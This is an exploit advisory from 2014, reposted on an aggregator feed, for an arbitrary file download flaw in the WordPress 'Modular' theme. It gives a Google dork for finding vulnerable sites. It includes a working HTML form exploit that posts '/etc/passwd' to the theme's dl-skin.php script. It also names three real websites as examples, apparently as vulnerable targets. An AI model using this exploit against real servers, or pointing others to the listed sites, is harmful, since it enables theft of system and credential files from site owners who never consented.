Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Wordpress Theme Modular Arbitrary File Download Vulnerability

$
0
0
Description:
This exploit allows attacker to download any writable file from the server
Usage info:
Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly


############################################################################

# Title : Wordpress Theme Modular Arbitrary File Download Vulnerability

# Author : Aloulou                                          

# Date : 19/06/2014                                                

# Facebook : http://www.facebook.com/Aloulou.TN                            

# Email: aloulou@alquds.com

# Vendor : www.wordpress.org                                                  

# Google Dork : inurl:/wp-content/themes/modular

# Tested on : Linux
                       


############################################################################



Exploit:

<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/modular/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>



   

Examples:
http://michaeltstirling.com
http://longlivepaintball.com
http://www.cabinet-weissreiner.fr

# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Viewing all articles
Browse latest Browse all 8064

Trending Articles